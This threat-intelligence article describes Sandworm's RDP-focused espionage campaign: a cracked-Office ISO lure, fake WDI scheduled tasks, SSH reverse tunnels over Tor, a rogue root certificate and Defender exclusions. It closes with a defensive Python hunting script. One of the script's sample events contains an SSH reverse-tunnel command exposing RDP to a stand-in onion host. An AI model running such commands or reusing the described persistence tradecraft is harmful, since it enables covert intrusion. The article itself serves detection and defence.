One of the world’s most dangerous state-backed hacking groups is actively targeting Remote Desktop Protocol (RDP) servers across critical infrastructure, defense organizations, and government agencies. The threat actor, tracked as APT-C-13 and more widely known as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, has been conducting cyber operations since at least 2009. Its latest campaign, however, marks a sharp shift in strategy: away from destructive, one-off strikes and toward quiet, long-term infiltration designed to harvest intelligence over extended periods.
The campaign’s entry point is a disguised ISO image named `Microsoft.Office.2025×64.v2025.iso`, distributed through Telegram channels and software-cracking communities in Ukraine. When a victim mounts the image and runs what appears to be the Microsoft Office installer or activator, hidden executables disguised as `auto.exe` or `setup.exe` launch silently in the background. The lure relies on the trust users place in familiar software names. Once triggered, the initial loader profiles the host and selectively deploys further malicious modules, including the components that set up covert RDP access described below.
Analysts at the 360 Threat Intelligence Center, writing on Weixin, identified the campaign and confirmed that APT-C-13 is deploying a modular penetration framework tracked as the Tambur/Sumbur/Kalambur series. The researchers describe the group’s overall shift as a move from “instantaneous disruption” to “intelligence-driven persistent parasitism”, a calculated evolution observed between 2024 and 2026. One confirmed victim was a technician at a Ukrainian state-owned shipbuilding and machinery manufacturing plant, where the attackers had already established deep, covert access. The potential impact is serious and far-reaching because the attack chain relies mainly on legitimate Windows components, including scheduled tasks, SSH, PowerShell, and RDP, and therefore often slips past standard antivirus solutions.
Persistence Through RDP Hijacking and Covert Tunneling
The most concerning technical aspect of this campaign is how the attackers establish and maintain long-term presence. The Tambur module, the core of this persistence strategy, plants scheduled tasks named “Tambur” and “Protector” under the `\Microsoft\Windows\WDI\Protector` task folder, a location chosen to mimic the native Windows Diagnostic Infrastructure (WDI) tasks so that the entries blend in with them. The tasks run with full administrator-level privileges and rely on a hardcoded password (`1qaz@WSX`, a keyboard-walk string that appears on common password lists) to keep RDP access to the infected host available without interruption; any account found using that password on a host is therefore a strong indicator on its own.
The Kalambur and Sumbur modules extend the attackers’ control by routing all command-and-control (C2) traffic through the Tor anonymity network, hiding the operators’ true location. Using SSH reverse tunneling, the attackers bind a port on the remote C2 server that forwards back to the victim’s RDP port (3389), so they can log in over RDP silently from virtually anywhere without a single inbound port being opened on the victim’s network. Sumbur, a more refined iteration of the framework, masquerades as Microsoft Edge’s update service: it stores malicious VBScripts in a fabricated Edge update directory and triggers them every four hours so that the activity blends in with routine software updates.
The DemiMur module completes the attack chain by installing a forged root certificate (`DemiMurCA.crt`) into the machine’s trusted root certificate store. Windows then treats anything signed under that rogue CA, including the attackers’ later payloads, as trusted and validly signed. Combined with forced Microsoft Defender exclusions covering the entire C: drive, this largely neutralizes the host’s native defenses and leaves the attackers an essentially unmonitored operating environment.
Organizations are advised to block third-party activation tools and unauthorized ISO images at the perimeter and on endpoints, since these are the campaign’s primary delivery mechanisms. Internal hosts should be monitored for the kinds of tampering described above: new scheduled tasks, especially under system folders such as WDI, registry changes to certificate stores and Defender exclusions, and unexpected PowerShell or script-host execution. Endpoint security solutions must be kept fully updated, with regular, comprehensive scans. Key institutions and industrial organizations should also strengthen internal auditing and write specific detection rules for anomalous RDP and SSH activity, such as the SSH client being launched with reverse-tunnel arguments or RDP logons from unexpected accounts, in order to cut off long-term intelligence theft.
The evolution of APT-C-13’s tactics, from destructive attacks to persistent information gathering through compromised RDP servers, underscores a broader trend in state-sponsored cyber warfare. The reliance on legitimate system tools and on anonymity networks makes detection significantly harder. Organizations must adapt their security postures to detect subtle, long-term intrusions rather than focusing solely on overt malicious activity. The ongoing nature of these campaigns means that vigilance and continuous adaptation of defensive strategies will remain paramount.
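As an added illustration (not code from the 360 Threat Intelligence Center report or from the malware itself), the following Python sketch turns the indicators from the preceding sections into host-side hunting rules and runs them over a handful of constructed endpoint events: a task created under the WDI folder, an SSH reverse tunnel exposing port 3389 over Tor, a VBScript launched from a fake Edge update directory, a write to the machine root certificate store, and a whole-drive Defender exclusion. The event schema, the WDI allowlist, and every sample event are assumptions made for the example.

```python
"""Hunting rules for the tradecraft described above, run over constructed telemetry.

Added example for this page; it is not code from 360 Threat Intelligence Center
or from the malware. The event schema (the "kind"/"task"/"image"/"cmdline"/"key"
fields) is an assumption loosely modelled on normalised Sysmon and Security-log
exports, and every sample event below is constructed for illustration.
"""
import re

# Assumption: analyst-maintained allowlist of genuine task names under
# \Microsoft\Windows\WDI\ (a stock Windows install ships ResolutionHost there).
REAL_WDI_TASKS = {"ResolutionHost"}
LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1", "0.0.0.0"}
# .onion destinations or the default Tor SOCKS ports appearing in a ProxyCommand.
TOR_HINTS = re.compile(r"\.onion\b|:(9050|9150)\b", re.IGNORECASE)

# Constructed sample events (not real telemetry).
EVENTS = [
    {"kind": "task_created", "task": r"\Microsoft\Windows\WDI\Protector\Tambur"},  # fake WDI task
    {"kind": "task_created", "task": r"\Microsoft\Windows\WDI\ResolutionHost"},    # genuine WDI task
    {"kind": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",            # reverse tunnel over Tor
     "cmdline": r'ssh.exe -N -o "ProxyCommand=nc -x 127.0.0.1:9050 %h %p" '
                r"-R 0.0.0.0:40022:127.0.0.1:3389 user@example.onion"},
    {"kind": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",            # benign local forward
     "cmdline": "ssh.exe -L 8080:intranet:80 admin@jump.corp.example"},
    {"kind": "process", "image": r"C:\Windows\System32\wscript.exe",                # VBScript in fake Edge dir
     "cmdline": r'wscript.exe "C:\Program Files (x86)\Microsoft\EdgeUpdate\Update\upd.vbs"'},
    {"kind": "registry_set",                                                          # root CA store write
     "key": r"HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0123456789ABCDEF0123456789ABCDEF01234567\Blob"},
    {"kind": "registry_set",                                                          # whole-drive exclusion
     "key": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\"},
]


def parse_reverse_forwards(cmdline):
    """Return (remote_port, target_host, target_port) for each -R on an ssh command line.

    Accepts '-R spec' and '-Rspec' with spec = [bind_address:]port:host:hostport.
    Assumption: IPv4/hostname telemetry only; IPv6 bracket syntax is not parsed.
    """
    forwards = []
    for spec in re.findall(r"(?:^|\s)-R\s*(\S+)", cmdline):
        parts = spec.split(":")
        if len(parts) < 3:
            continue  # '-R port:socket' and similar forms are out of scope here
        *_, remote_port, host, target_port = parts
        if remote_port.isdigit() and target_port.isdigit():
            forwards.append((int(remote_port), host, int(target_port)))
    return forwards


def evaluate(event):
    """Apply every rule to one event; return a list of (rule_name, severity)."""
    hits = []
    kind = event.get("kind")
    if kind == "task_created":
        folder, _, name = event["task"].rpartition("\\")
        # Anything under the WDI folder that is not a known WDI task is suspicious:
        # the Tambur and Protector tasks are placed there to pass as diagnostics.
        if folder.lower().startswith(r"\microsoft\windows\wdi") and name not in REAL_WDI_TASKS:
            hits.append(("task_in_wdi_folder_not_allowlisted", "high"))
    elif kind == "process":
        image, cmd = event["image"].lower(), event.get("cmdline", "")
        if image.endswith("\\ssh.exe"):
            for _, host, port in parse_reverse_forwards(cmd):
                if port == 3389:  # this host's (or a neighbour's) RDP exposed on the C2 side
                    hits.append(("ssh_reverse_tunnel_exposes_rdp",
                                 "critical" if host in LOCAL_HOSTS else "high"))
            if TOR_HINTS.search(cmd):
                hits.append(("ssh_via_tor", "high"))
        if image.endswith(("\\wscript.exe", "\\cscript.exe")) and \
                re.search(r"edgeupdate\\.*\.vbs\b", cmd, re.IGNORECASE):
            # The genuine updater is MicrosoftEdgeUpdate.exe; it ships no VBScript.
            hits.append(("vbscript_in_edgeupdate_dir", "high"))
    elif kind == "registry_set":
        key = event["key"].lower()
        if "\\systemcertificates\\root\\certificates\\" in key:
            # Writes to the machine Trusted Root store (where DemiMurCA.crt would land).
            # Medium only: legitimate enterprise PKI deployment does the same, so triage.
            hits.append(("machine_root_ca_store_write", "medium"))
        if re.search(r"\\windows defender\\exclusions\\paths\\[a-z]:\\?$", key):
            hits.append(("defender_exclusion_whole_drive", "critical"))
    return hits


def hunt(events):
    """Run the rules over a sequence of events; return findings with the event index."""
    return [{"event": i, "rule": rule, "severity": sev}
            for i, ev in enumerate(events) for rule, sev in evaluate(ev)]


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"[{f['severity']:>8}] event {f['event']}: {f['rule']}")
```

Running the script flags events 0, 2 (twice), 4, 5 and 6 and leaves the genuine WDI task and the ordinary local forward alone. The root-store rule is deliberately graded lower than the others because enterprise PKI rollouts write to the same key; the reverse-tunnel rule is the one worth paging on, since a workstation has no business exporting its own port 3389 to a remote host.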

